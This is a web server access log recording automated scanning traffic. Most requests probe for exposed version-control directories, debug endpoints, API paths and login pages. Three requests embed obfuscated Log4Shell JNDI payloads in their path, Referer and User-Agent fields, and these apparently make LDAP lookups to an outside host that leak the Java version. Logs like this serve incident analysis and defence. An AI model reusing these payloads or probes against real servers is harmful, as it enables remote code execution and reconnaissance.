34.19.116.55 - - [01/Aug/2026:01:52:01 +0000] "ZSDLKFJ2 /${${irhb:ir4:-j}${hsx:u:ucsn:-n}${iw3:-d}${d:godq:-i}${p:-:}${g6e:y7:-l}${y:3p:-d}${68:-a}${3pm:-p}${zi:x6i:-:}${lh:-/}${bnz:-/}${b:qh10:-P}${ak3d:at:he:-A}${gct:-l}${vko:rk:-0}${3:-c}${7:o4gy:p1wl:--}${${w:-s}${mcs:py1u:-y}${iqp:s:-s}${4bwt:-:}${4w16:-j}${2m0x:ac0h:-a}${yg:-v}${q7v:q:n2:-a}${6bn:-.}${sue8:njvm:-v}${r3b:-e}${t4sg:h:bh1:-r}${n:yu0:-s}${79:58ao:y:-i}${qf:gd4w:-o}${50:-n}}${hby:-.}${xad5:f4m0:-1}${0qdu:7:-6}${l:-b}${id:ra:-d}${v7e:xsz:m:-9}${nt:-0}${h:e4ux:57lh:-8}${9:n1gk:-f}${yqrb:-2}${0p:-9}${0nk:-c}${yk:-e}${4n:-e}${n:-5}${56:za:-f}${z:u76i:-4}${p:-a}${eyk:8iz:j:-3}${x:ou:u87:-1}${j7a:grji:e28b:-6}${j:-b}${l0w:h:oj:-d}${uoc6:j:9oc3:-1}${fb:5ux:yw:-a}${zy2s:-4}${ph:k28:x:-c}${qgf:xsl:-c}${5u:ig:q5u:-5}${p:-e}${n:fg2j:nvd:-a}${fk:7:lk:-e}${it2g:a:d0:-9}${pey2:52gj:h28:-3}${9c:i9:9no:-3}${gbm:fme0:p1j:-8}${7rke:-f}${swao:mio1:xjwn:-d}${1d9u:z:8t:-9}${5:xp2l:-0}${v25t:-e}${hce:rnt:co1k:-2}${k:v4i:5:-a}${sakt:-.}${7t:nv0:ebx:-d}${5:9iv:hae:-n}${a:t6yu:-s}${mv09:nmj0:0ozk:--}${r7:s:-e}${wa:gxcp:wu:-x}${4qn:cq:-f}${6uoz:-i}${4:0ej:zu59:-l}${82:-.}${kb:-m}${j9:8:-a}${cgeb:kpe:-s}${0u:-m}${5fn:ai8p:0:-c}${bk:-o}${9e6:rg2:apf:-r}${2:o6:8j:-e}${91c0:--}${l24:bw:-c}${rad:-f}${h:--}${rq2h:-p}${xvn:ulk:-r}${q9d:-o}${834:g5:-d}${j:j:--}${7bp:-0}${onb2:-2}${jvb:f3ax:-.}${g:-m}${w:ae:f0:-a}${cg1:-s}${fubx:m:-m}${muv:a:-.}${n:x87:-c}${n807:si8p:0ji:-l}${q5h:xgec:xo:-o}${o:efp:5ef6:-u}${6e72:f8t:vp:-d}${tls:y42p:wmi0:-f}${win:-e}${x:x4:adb1:-r}${9f:-r}${id:uoy2:v:-y}${i:-.}${vs7:raso:vh:-g}${r:-o}${k:-o}${r:-g}} HTTP/2.0" 404 - "${${rfy9:-j}${y:pj:41:-n}${bn:plm4:a0:-d}${plh:u:-i}${5:5:1:-:}${el6r:wgp:-l}${9:vzuy:5i:-d}${6qnb:-a}${7:x:-p}${6ucj:-:}${jm:1jge:kx0i:-/}${6n8:-/}${3tgv:-R}${l:js:-E}${2gk:k7:-l}${uc:-0}${uob:ap1:q:-c}${0:k5uy:--}${${gl:dt:-s}${mpql:-y}${e75:-s}${56:-:}${g45:t:-j}${ls:4xjr:-a}${1:p:-v}${9qz1:2:-a}${l:-.}${w3ku:es:-v}${hv:8i:-e}${29pr:zv:6gs:-r}${pzh:-s}${e:-i}${jf:2r:-o}${q:h0:-n}}${b3:k:2i0a:-.}${6ny1:-1}${89:7s:w0r:-6}${9ns:-b}${wf0:39cd:r:-d}${0zh:-9}${4i63:p8:fyjp:-0}${1j3z:7l9d:8zly:-8}${k:-f}${xne:cd:-2}${a:xu2:-9}${6:-c}${4qi:-e}${r1e:pba0:-e}${629:a:-5}${tn6:3r:v:-f}${io:-4}${lth:et:d:-a}${2:79vj:a:-3}${epo:fsmu:-1}${d53:q:-6}${rop6:-b}${64s:-d}${kq:p:-1}${xaw:-a}${bw9u:wjm:-4}${r7lf:ck:d:-c}${ra:-c}${97:dg:kpb:-5}${tb:cv9:htpc:-e}${q9v0:80en:-a}${01vz:-e}${p:b3ai:-9}${a:-3}${6e0:j91:u:-3}${1ef:5:a:-8}${nh:q:-f}${6:yk3:u758:-d}${74z1:7q0:-9}${z:bs:-0}${ipt:f5v:f:-e}${o8ql:zk4:5:-2}${6s1:hz:9i0:-a}${4k8s:-.}${0cf:1o:-d}${mg:e:9tb:-n}${uxrj:8txv:-s}${ewsy:g625:--}${nr:-e}${t:2v:-x}${gx:-f}${45x:t7dk:-i}${hig:4x6:uly:-l}${6lva:xtb8:7ux:-.}${p1:-m}${mn51:nyep:-a}${0nq1:-s}${3:h:uv:-m}${la5:0t:km:-c}${wz:ecg3:gx:-o}${b4:ybxt:egj:-r}${y:-e}${os:3:z1:--}${sab:w:1kug:-c}${a:n6:-f}${fgw4:--}${av:v0:gzd:-p}${r:y:-r}${zpiw:lb:-o}${d:d:-d}${ih:7:--}${3au:bz:-0}${013:crb:5:-2}${i6:3a:tflz:-.}${d:-m}${9v:-a}${96:kbgn:-s}${z7:m7lq:-m}${v54q:7:q:-.}${gu:gc:3ch:-c}${6s:-l}${h4:-o}${fjo:-u}${nxat:b1y:dbtn:-d}${zsvk:j5:or:-f}${jf:3q:-e}${1:afkw:a:-r}${x:-r}${23:fv:fx68:-y}${hu0:sl:c47:-.}${p:bnh:ic:-g}${xon:-o}${1:co:8w3:-o}${7ng:pe:uq:-g}}" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.176 - - [01/Aug/2026:01:52:01 +0000] "POST /login HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:01 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:01 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:01 +0000] "GET / HTTP/2.0" 200 11229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [01/Aug/2026:01:52:01 +0000] "POST /login HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.176 - - [01/Aug/2026:01:52:01 +0000] "PUT /${${7:tp3:-j}${7kn:tdg:h8n0:-n}${o:rh:-d}${7zi:-i}${y8:sk:x:-:}${i:mr:-l}${h:-d}${r3:wa:-a}${tdu:3n:-p}${qjvy:n:-:}${4iy5:cjh:cgh:-/}${c2d:hap:-/}${2x4:-P}${r:51z:py8:-A}${gavw:4j5z:-l}${p1i:-0}${sk:-c}${t7z8:--}${${oc1:3:4f:-s}${da8:e:-y}${w:5:03rp:-s}${s1c9:97eo:-:}${56:j096:-j}${hg:4:2sz:-a}${lm:-v}${1j7:72:-a}${th0:9z:-.}${7:dl:3:-v}${rg4e:okgi:2:-e}${r4:is:oajm:-r}${5n4:i8:oj:-s}${e:5x7:d:-i}${5:s0ut:7hml:-o}${hx:-n}}${r:jmg:qx:-.}${zys2:x:p3:-c}${h4:rh1:q01:-c}${4q:ox7r:dwsa:-4}${g9ep:-7}${9c:-d}${w5v7:-0}${bfl:r:54z:-1}${l:-1}${te:x28:qc:-b}${0lon:-3}${7hu:-7}${kir3:t:6tdj:-8}${z9l:-0}${pw:79c:-0}${k2:e:2:-5}${4apx:-d}${s:hms:rosv:-6}${gdns:9t8z:e:-2}${n:2h4y:93j6:-5}${j:do:-b}${sq:n2:5:-f}${we:w71:-e}${52t:-c}${8:-9}${1:-e}${7k1:3gqj:-f}${g:f1l:-0}${cp8:eg:-a}${wtz:-c}${t:-3}${u46:lkd4:sqk:-7}${d7:9o:vux:-5}${s:-3}${ka:h:pc:-3}${o:2:-8}${c:-f}${nc0p:m9:-d}${7:zy:u30r:-9}${w:-0}${31c:kobu:76:-e}${nta:-2}${y:x:alix:-a}${im6c:dfh:-.}${0xp:ple2:-d}${yx:81:4v:-n}${x:-s}${h:--}${myb:z0:l2g:-e}${4:-x}${94g5:2:-f}${use:r:-i}${5j:dzb5:-l}${9s:l8:g:-.}${zs:8:-m}${mdqz:-a}${9x2i:3ik:-s}${f4:1o:-m}${slae:-c}${sc8t:-o}${ze:t3yj:zu:-r}${9o3:m:y7sg:-e}${cm:cq:--}${i:ym:-c}${46lw:19l:-f}${2y9:o:n7op:--}${o2fg:6:8xog:-p}${b:-r}${c:-o}${p65:z07:y1:-d}${cr:--}${4qeb:ncr:q:-0}${y3e:9lx3:yc3l:-2}${o:wbe:92:-.}${6:73f:-m}${1yo:4:rh:-a}${g:vs:d:-s}${kjbn:u5:-m}${c:7twg:bw:-.}${7whn:-c}${9:yfpu:-l}${95tc:-o}${4mz:6fgl:-u}${dx9:-d}${suv4:pek:-f}${n:a7:-e}${sa:t:t:-r}${ij19:8l:-r}${wdo3:-y}${fts:-.}${ks:-g}${dio9:o:-o}${5mey:5z:-o}${95n:tf42:-g}} HTTP/2.0" 404 - "${${l4:gma9:-j}${0ev:-n}${nm:ob37:x:-d}${og:vh8:69qw:-i}${w:u:-:}${57mq:9z:-l}${x:-d}${t:n51:a:-a}${73:-p}${3702:c:7sx3:-:}${l:-/}${ksxn:-/}${ilr:syc:v:-R}${m:-E}${yz4:akxc:-l}${l1ac:b:-0}${wx:-c}${n:dr2:p:--}${${zuf:-s}${db4q:-y}${zre:j7n:-s}${v48y:tmk:-:}${olv:yow:mp:-j}${0p5d:-a}${8:-v}${1ev:l9:-a}${i8x:t5l:qv:-.}${10:-v}${t:2:-e}${md:59q:-r}${p5:j0v:n3y2:-s}${nyad:s:0:-i}${t84f:my0:-o}${l0ry:-n}}${u8:tj9:g1:-.}${u:b:-c}${lc8t:tm:-c}${dbe:mub:-4}${5nf:oyh:jd:-7}${ueik:yk:-d}${nrh:o:-0}${85:cox:-1}${3:4n:-1}${64p:-b}${eq:-3}${mdqw:h768:-7}${pkg:-8}${df:e:xap:-0}${j0g:cmu:j3:-0}${n9bv:qp:n3:-5}${a:x98o:-d}${79c:3wq9:-6}${3:-2}${i:-5}${dxig:s6t:-b}${q:-f}${dsv:8y:-e}${3cr:jtu1:g:-c}${l1q6:gjp:-9}${76:i:9lq2:-e}${n:-f}${jp8r:1ni:-0}${hzn:sk8:l9n:-a}${3:9s:-c}${pc:0nux:02:-3}${8vs:-7}${hzq:-5}${dlr:m10l:j:-3}${gcol:r:ymwa:-3}${rp9:klus:ltw:-8}${h3:i7y:mw4:-f}${p:-d}${tw:m1cq:w3:-9}${1meh:-0}${179b:hr:-e}${q65:-2}${87n:fc:-a}${c9g:9:v93:-.}${o:2ars:-d}${dk6:2r:iw:-n}${8l4:ndm5:-s}${k78:2de:2:--}${xob:43i:fs:-e}${sd9:ql:bzia:-x}${e:9xd:-f}${3d:-i}${9jkt:grh:-l}${dkl:-.}${y:-m}${fhy:u:jg:-a}${mw:k:-s}${lknx:e7f:-m}${ct8:sbaf:-c}${6irq:4i:ju0s:-o}${cb8:-r}${7p:-e}${xugm:m:--}${6zr1:-c}${if1b:2dz:-f}${1aj3:3:b:--}${a83r:0z:-p}${sw:-r}${ev0d:x:af:-o}${k1q0:i9:-d}${2:--}${7c:-0}${g:cs:-2}${k:at:n:-.}${w:48:-m}${9vu:uyk:7ds:-a}${3rn:j:c:-s}${tas5:-m}${en:5:-.}${wrft:-c}${8n30:bcp6:-l}${j:f1:r9:-o}${z1s:ks:mzg:-u}${l7e:-d}${v3at:g:c0jy:-f}${uxqy:r2:zmdu:-e}${1cx:d:g8:-r}${1mg:2r53:0:-r}${ad2:m:facb:-y}${c:-.}${kr39:5ijm:-g}${2bf:81:-o}${3c:nw9:-o}${ao:lve:-g}}" "${${x7:-j}${n0i:dv:rk0:-n}${x:s:-d}${9:sjfz:-i}${5b3:3w:-:}${wq:bf:-l}${nlbg:yj:c:-d}${ne7:o8ly:-a}${w:2v:-p}${gv:-:}${4:t:sduo:-/}${2itm:-/}${j1ul:sdh:tyf:-U}${a:-A}${tyjk:-l}${6a:k71l:-0}${j3:t:-c}${3:98:--}${${lir:zw:-s}${xdhn:0u:zx:-y}${y684:-s}${ni5:-:}${qz:l:-j}${d4a:7:jmzk:-a}${0rve:-v}${tf:3:-a}${1:2f5o:-.}${f5bk:-v}${o42:gjn:-e}${r:vb0:e2:-r}${e63y:6:-s}${1ks:6ap:-i}${lk1:-o}${ya5b:qd:rg50:-n}}${p:-.}${ixf0:0g:-c}${6ul:-c}${rsn:p7uk:pri:-4}${9:-7}${52:0zv2:7yg:-d}${ly:-0}${u6:j05g:-1}${75q:f2:25um:-1}${2:owqj:-b}${oj:la04:-3}${orj:-7}${zyc:6azx:z:-8}${eg7:z:pxqw:-0}${3qn:fgrv:-0}${umnf:-5}${1a:h07:-d}${9qe:jbu5:y:-6}${1:3:9:-2}${9:kbtg:3ng6:-5}${y0hv:to3:v:-b}${0:1ax:h:-f}${2h:am:u9:-e}${21:x9:-c}${lq:2c:-9}${mbxu:4o6:74h:-e}${4f:9:ey5:-f}${q:-0}${opie:58:-a}${qorn:zbl:ib8j:-c}${q:-3}${eq:4:x:-7}${h:g:-5}${h4:2:-3}${fvzi:-3}${md:kfi2:nzsq:-8}${a5np:qdm:-f}${b5m:-d}${e:3n5:ob:-9}${2uvt:rph:4vb:-0}${ibw:4m:g6eo:-e}${86ns:-2}${nek0:h:-a}${j:-.}${h8:-d}${dg:-n}${u:fx6:wugt:-s}${96:--}${jm3:c3os:-e}${x:-x}${e1s9:webm:-f}${jn8o:q87:ga:-i}${85g:zk2:-l}${w:-.}${i:-m}${yg4:19s:-a}${6:-s}${1hgy:8g3:-m}${hmo:t9:cbfz:-c}${m5lr:c:-o}${0cw8:-r}${0smx:-e}${poa:s:2w8y:--}${gjw1:-c}${1kg:-f}${b:4t:vug:--}${07f:u2q:47fw:-p}${3:-r}${j:-o}${0:btkn:ey:-d}${zi:p7rd:--}${4:5:-0}${ld:p:-2}${of4:9l:9:-.}${n3h7:-m}${a1b:oh:-a}${y:lwo:92o0:-s}${c3xf:2a3i:p4m:-m}${b5ko:-.}${m60d:s:-c}${kg:a:gmh:-l}${qx5:r:zk6s:-o}${5wu:fds:-u}${x:14r:-d}${nu05:-f}${9aju:-e}${q90r:q:-r}${0t:8:-r}${w:q4:-y}${2if:-.}${3:gei3:-g}${3i4:-o}${tj:03f:c89:-o}${8:qn:-g}}"
34.19.127.206 - - [01/Aug/2026:01:52:01 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.199 - - [01/Aug/2026:01:52:01 +0000] "GET /debug/pprof HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:01 +0000] "GET /.git HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [01/Aug/2026:01:52:01 +0000] "POST /login HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:01 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:01 +0000] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:01 +0000] "GET /.git/config HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:01 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [01/Aug/2026:01:52:02 +0000] "PUT /${${3lmr:pu:-j}${kx:re0:qh:-n}${u:-d}${p:o0j:0wu:-i}${rvn:51:t5m:-:}${l4:9:pv1o:-l}${fj9d:-d}${mlsg:-a}${1c:-p}${5k:-:}${09:8ux:-/}${0:5btr:a:-/}${gae:yb7:l:-P}${rcz:9:6edz:-A}${t:zma:-l}${4aj:la4q:2hg:-0}${i:nksm:-c}${9v:--}${${9wx:lzkd:-s}${lu4:r7p:-y}${0:yilu:-s}${dnvw:en:-:}${x6vn:6:vcq0:-j}${q9k:qw21:wum:-a}${nj:-v}${m:g:-a}${7:k2:tl41:-.}${ika:g:gr:-v}${4db:i9z2:07o3:-e}${7a:gq:-r}${2:bcso:-s}${3esq:-i}${yw:-o}${l39:u12:lb:-n}}${h:j97:-.}${u:-1}${me:-6}${5ji:-b}${kgan:5:52:-d}${n:0:-9}${iq5:goj:xf:-0}${7j38:nk2y:2kb:-8}${it:-f}${23sq:-2}${0:8eh7:e8:-9}${hnc:3:j4y:-c}${ud3h:-e}${9:j0:-e}${jo:g:-5}${e2:mv:10c6:-f}${u7:k74:-4}${s36:6w:-a}${h:dxwi:-3}${q5d:-1}${f:p:-6}${kd3:v:be3:-b}${90p:-d}${fhq:-1}${m:-a}${r:f:z:-4}${g:r3z0:-c}${g:-c}${eq:a3c:-5}${si:sgz:zxq:-e}${y0l:l:-a}${9:a:-e}${w54b:seim:-9}${eoqi:-3}${mj8:9r6:7:-3}${gq:o6zx:-8}${o:bd:-f}${rw:-d}${xw0:y:la:-9}${5cwa:59mz:e:-0}${bpsn:-e}${f:4gpu:-2}${f:-a}${r4b:uvj:-.}${ue:hb:-d}${2:-n}${9:-s}${wol:e:d:--}${1lwt:l0:oms:-e}${nf7:-x}${rj:-f}${n8e4:-i}${ic7j:-l}${a4:ft:-.}${8:3w6o:-m}${v0:j:-a}${3pz0:-s}${urjy:hjz2:-m}${e2:j9:sgfn:-c}${8e:as5:fo:-o}${q:z5:-r}${4t8v:r:qwoh:-e}${vmxl:axj:mu:--}${rc:i2t:-c}${4owd:-f}${r8:94iw:--}${8:gl:-p}${t7vm:ix:-r}${k4na:30:mfnt:-o}${vzxj:n:718k:-d}${y:--}${pfi:mxsb:5q2:-0}${cz:3z:a6:-2}${p:1uy:udy:-.}${4r:l:-m}${jksr:zpt:q09u:-a}${3kga:-s}${nm4w:-m}${4n5z:-.}${5dxe:fzek:-c}${q8yc:n:-l}${y:b:-o}${jf:01:p2x:-u}${3j9:up:-d}${dfj:-f}${pk:r:ew3u:-e}${d2:-r}${3qh:u8i:k:-r}${2:s:-y}${pwa:-.}${sk7:jo:ou:-g}${dq:-o}${6m:-o}${bq:o8:8:-g}} HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:02 +0000] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:02 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:02 +0000] "GET / HTTP/1.1" 200 3528 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:02 +0000] "GET /.git/config HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:02 +0000] "GET /.hg HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:02 +0000] "GET /api HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:02 +0000] "GET /.hg HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:03 +0000] "GET /api HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:03 +0000] "GET /.bzr HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:03 +0000] "GET /.bzr HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:03 +0000] "GET /api HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:03 +0000] "GET /.svn HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:03 +0000] "GET /api/v1 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:04 +0000] "GET /.svn HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:04 +0000] "GET /.svn/entries HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:04 +0000] "GET /api/v1 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:04 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:04 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:04 +0000] "GET /api/v1/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:04 +0000] "GET /.svn/entries HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:05 +0000] "GET /.svn/prop-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v2 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v1/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v1 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:05 +0000] "GET /.svn/prop-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.52 - - [01/Aug/2026:01:52:05 +0000] "GET /.svn/text-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v2/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.190 - - [01/Aug/2026:01:52:05 +0000] "GET /api/v2 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.127.180 - - [01/Aug/2026:01:52:06 +0000] "GET /api/v2 HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.58 - - [01/Aug/2026:01:52:06 +0000] "GET /.svn/text-base HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
